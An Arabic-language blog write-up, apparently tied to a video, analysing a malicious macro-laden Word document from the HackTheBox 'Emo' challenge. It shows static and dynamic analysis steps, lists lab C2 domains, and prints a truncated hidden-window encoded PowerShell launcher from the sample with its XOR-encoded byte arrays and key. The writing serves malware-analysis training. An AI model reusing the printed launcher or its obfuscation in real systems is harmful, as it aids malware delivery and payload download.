لقد قمنا بتغطية تحليل مستند مكتبي يحتوي على رمز ماكرو مضمن مكتوب بلغة Visual Basic. يُزعم أن المستند يسبب الإصابة ببرنامج الفدية، لذا أجرينا تحليلًا ثابتًا يتضمن استخراج السلاسل ذات الصلة، وحساب تجزئة MD5، والبيانات الوصفية، والكشف عن روتين الماكرو المخفي باستخدام أدوات مثل olevba. بعد ذلك أرسلنا التجزئة إلى محركات التحليل عبر الإنترنت مثل VirusTotal وتبين أنها ضارة من حيث أنها تنفذ أمر Powershell الذي يتصل بخادم c2 لتنزيل المزيد من الحمولات. لقد وجدنا أيضًا أمثلة لتشفير XOR مع مفتاح XOR الذي تم استخدامه بعد ذلك لفك تشفير الأحرف التي تم تشفيرها مسبقًا في شكل عشري. كان هذا جزءًا من تحدي HackTheBox ايمو.

احصل على ملاحظات شهادة OSCP

الدورة العملية الكاملة لاختبار اختراق تطبيقات الويب

وصف التحدي

لقد انتشر برنامج الفدية WearRansom في شركتنا. قامت SOC بتتبع الوصول الأولي إلى هجوم التصيد الاحتيالي، وهو مستند Word يحتوي على وحدات ماكرو. ألقِ نظرة على المستند لترى ما إذا كان بإمكانك العثور على أي شيء آخر حول البرامج الضارة وربما علامة عليها.

أبرز مقاطع الفيديو

في هذا الفيديو، نلعب دور المستجيب للحوادث ونقوم بتحليل مستند Word مكتبي ضار يحتوي على رمز ماكرو ضار ينفذ Powershell الذي ينفذ بعض تشفير XOR ويستدعي خادم الأوامر والتحكم لإسقاط المزيد من الحمولات على الجهاز المصاب. لذا، سنقوم بشكل أساسي بعزل الجهاز المصاب وقطع الإنترنت واستنساخه للتحليل.

أول شيء سنبدأ بتحليل البرامج الضارة الثابتة عن طريق تنفيذ عدة أوامر مثل استخراج السلاسل ذات الصلة من العينة وحساب تجزئة MD5 واستخراج إجراءات الماكرو باستخدام بعض الأدوات مثل olevba وoledump.py

يحتوي روتين الماكرو على الأوامر والحمولات التي يتم تنفيذها على الجهاز بما في ذلك أمر Powershell. بعد التحليل الثابت، نقوم بإجراء التحليل الديناميكي الذي يكشف عن العمليات التي تم إنشاؤها واتصالات الشبكة ومفاتيح التسجيل المعدلة والأحداث التي تم تشغيلها. بالإضافة إلى ذلك، يجب عليك مراعاة الطابع الزمني عند البحث عن الأحداث في "عارض الأحداث". لذا، إذا قمت بالفتح أثناء التحليل الديناميكي، فلنفترض أنك فتحت المستند الضار في الساعة 19:35 مساءً، فسيتعين عليك استخدام هذا الوقت وتصفية الأحداث التي تم تشغيلها بالضبط في الطابع الزمني المحدد.

يمكن العثور على تقرير التحليل الديناميكي لهذه العينة على Any.run

بعض المجالات التي تم التواصل معها في العينة موجودة أدناه

da-industrial.htb daprofesional.htb www.outspokenvisions.htb dagranitegiare.htb mobsouk.htb biglaughs.htb nglistics.htb

يوجد أدناه أمر Powershell الذي تم الكشف عنه من تقرير التحليل الديناميكي

POwersheLL -windowstyle مخفي -ENCOD IABTAFYAIAAgADAAegBYACAAKABbAFQAeQBQAGUAXQAoACIAewAyAH0AewAwAH0AewA0AH0AewAzAH0AewAxAH0AigAtAGYAIAAnAGUAJwAsACccgBFAEMAdABvAHIAWQAnACwAJwBzAFkAcwB0ACcALAAnAC. 4ASQBPA

سيتم فك تشفير أمر powershell أعلاه باستخدام Cyberchef باستخدام frombase64 وإزالة البايتات الخالية. سيعطيك هذا الحمولة الكاملة التي يمكننا من خلالها تسليط الضوء على الإعلانات المتغيرة أدناه:

$FN5ggmsH += (186,141,228,182,177,171,229,236,239,239,239,228,181,182,171,229,234,239,239,228)

$FN5ggmsH += (185,179,190,184,229,151,139,157,164,235,177,239,171,183,236,141,128,187,235,134,128,158,177,176,139)

$FN5ggmsH += (183,154,173,128,175,151,238,140,183,162,228,170,173,179,229)

إذا استخدمنا chardecode واستخدمنا العلامة العشرية في Cyberchef، فسوف نقدم لنا سلسلة مشفرة باستخدام XOR ومفتاحها هو 0xdf والذي يمكن العثور عليه في السطر الذي يسلط الضوء على ما يلي في الحمولة الأصلية بعد فك تشفيرها في Cyberchef.

+= ([بايت][شار]${_} -bxor 0xdf )

تجول الفيديو

, , , ,
عرض التعليقات

معتصم

عن المؤلف

أقوم بإنشاء ملاحظات حول الأمن السيبراني وملاحظات التسويق الرقمي والدورات التدريبية عبر الإنترنت. أقدم أيضًا استشارات التسويق الرقمي بما في ذلك، على سبيل المثال لا الحصر، تحسين محركات البحث وإعلانات Google وMeta وإدارة CRM.

عرض المقالات